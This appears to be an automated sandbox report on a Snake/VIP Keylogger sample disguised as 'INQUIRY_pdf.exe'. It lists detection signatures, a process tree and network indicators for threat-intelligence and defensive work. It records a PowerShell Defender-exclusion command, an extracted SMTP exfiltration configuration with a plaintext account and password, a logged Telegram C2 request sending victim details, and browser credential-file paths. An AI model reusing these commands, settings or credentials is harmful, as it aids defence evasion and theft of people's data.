Edit tour

Windows Analysis Report
INQUIRY_pdf.exe

Overview

General Information

Sample name:	INQUIRY_pdf.exe
Analysis ID:	1557933
MD5:	aad0e1f44c81477576e5b1a1a31f3513
SHA1:	aaa55fd38d696c09f0ba9b8511efac0c9d68b63a
SHA256:	5e8880438f921f4bd81f137cc9b4c44f1ba12b321a178d4d50a0601d75aef049
Tags:	exeMassLoggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

INQUIRY_pdf.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\INQUIRY_pdf.exe" MD5: AAD0E1F44C81477576E5B1A1A31F3513)

powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7840 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

INQUIRY_pdf.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\INQUIRY_pdf.exe" MD5: AAD0E1F44C81477576E5B1A1A31F3513)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "mikellog@jhxkgroup.online", "Password": "7213575aceACE@  ", "Host": "jhxkgroup.online", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mikellog@jhxkgroup.online", "Password": "7213575aceACE@  ", "Host": "jhxkgroup.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc82e8:$a1: get_encryptedPassword 0x2695e0:$a1: get_encryptedPassword 0x2ac600:$a1: get_encryptedPassword 0xc8870:$a2: get_encryptedUsername 0x269b68:$a2: get_encryptedUsername 0x2acb88:$a2: get_encryptedUsername 0xc7f5b:$a3: get_timePasswordChanged 0x269253:$a3: get_timePasswordChanged 0x2ac273:$a3: get_timePasswordChanged 0xc8072:$a4: get_passwordField 0x26936a:$a4: get_passwordField 0x2ac38a:$a4: get_passwordField 0xc82fe:$a5: set_encryptedPassword 0x2695f6:$a5: set_encryptedPassword 0x2ac616:$a5: set_encryptedPassword 0xcb01a:$a6: get_passwords 0x26c312:$a6: get_passwords 0x2af332:$a6: get_passwords 0xcb3ae:$a7: get_logins 0x26c6a6:$a7: get_logins 0x2af6c6:$a7: get_logins
Process Memory Space: INQUIRY_pdf.exe PID: 7448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7448	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7448	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7448	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7448	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x522a0:$a1: get_encryptedPassword 0x5281e:$a2: get_encryptedUsername 0x51f22:$a3: get_timePasswordChanged 0x52039:$a4: get_passwordField 0x522b6:$a5: set_encryptedPassword 0x54f7a:$a6: get_passwords 0x5530a:$a7: get_logins 0x54f66:$a8: GetOutlookPasswords 0x5491f:$a9: StartKeylogger 0x55263:$a10: KeyLoggerEventArgs 0x549bf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: INQUIRY_pdf.exe PID: 7648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7648	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7648	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: INQUIRY_pdf.exe PID: 7648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbbad3:$a1: get_encryptedPassword 0xbc051:$a2: get_encryptedUsername 0xbb755:$a3: get_timePasswordChanged 0xbb86c:$a4: get_passwordField 0xbbae9:$a5: set_encryptedPassword 0xbe7ad:$a6: get_passwords 0xbeb3d:$a7: get_logins 0xbe799:$a8: GetOutlookPasswords 0xbe152:$a9: StartKeylogger 0xbea96:$a10: KeyLoggerEventArgs 0xbe1f2:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data 0x397a5:$a5: \Kometa\User Data\Default\Login Data
0.2.INQUIRY_pdf.exe.3ddf960.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data 0x397a5:$a5: \Kometa\User Data\Default\Login Data
0.2.INQUIRY_pdf.exe.3d9c940.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
4.2.INQUIRY_pdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.INQUIRY_pdf.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.INQUIRY_pdf.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.INQUIRY_pdf.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.INQUIRY_pdf.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
4.2.INQUIRY_pdf.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a969:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abc6:$a4: \Orbitum\User Data\Default\Login Data 0x3b5a5:$a5: \Kometa\User Data\Default\Login Data
4.2.INQUIRY_pdf.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a969:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abc6:$a4: \Orbitum\User Data\Default\Login Data 0x3b5a5:$a5: \Kometa\User Data\Default\Login Data
0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x739de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73397:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73cdf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQUIRY_pdf.exe", ParentImage: C:\Users\user\Desktop\INQUIRY_pdf.exe, ParentProcessId: 7448, ParentProcessName: INQUIRY_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", ProcessId: 7632, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQUIRY_pdf.exe", ParentImage: C:\Users\user\Desktop\INQUIRY_pdf.exe, ParentProcessId: 7448, ParentProcessName: INQUIRY_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe", ProcessId: 7632, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:40:59.520881+0100	2803305	3	Unknown Traffic	192.168.2.4	49735	188.114.97.3	443	TCP
2024-11-18T18:41:03.287021+0100	2803305	3	Unknown Traffic	192.168.2.4	49741	188.114.97.3	443	TCP
2024-11-18T18:41:09.538034+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.97.3	443	TCP
2024-11-18T18:41:13.853029+0100	2803305	3	Unknown Traffic	192.168.2.4	49753	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:40:57.524985+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49732	132.226.247.73	80	TCP
2024-11-18T18:40:58.743840+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49732	132.226.247.73	80	TCP
2024-11-18T18:41:00.446858+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: INQUIRY_pdf.exe

Avira: detected

Found malware configuration

Source: 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mikellog@jhxkgroup.online", "Password": "7213575aceACE@ ", "Host": "jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "mikellog@jhxkgroup.online", "Password": "7213575aceACE@ ", "Host": "jhxkgroup.online", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: INQUIRY_pdf.exe

ReversingLabs: Detection: 24%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: INQUIRY_pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: INQUIRY_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: INQUIRY_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4x nop then jmp 0108F8E9h		4_2_0108F644
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4x nop then jmp 0108FD41h		4_2_0108FA9C

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2019/11/2024%20/%2010:54:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
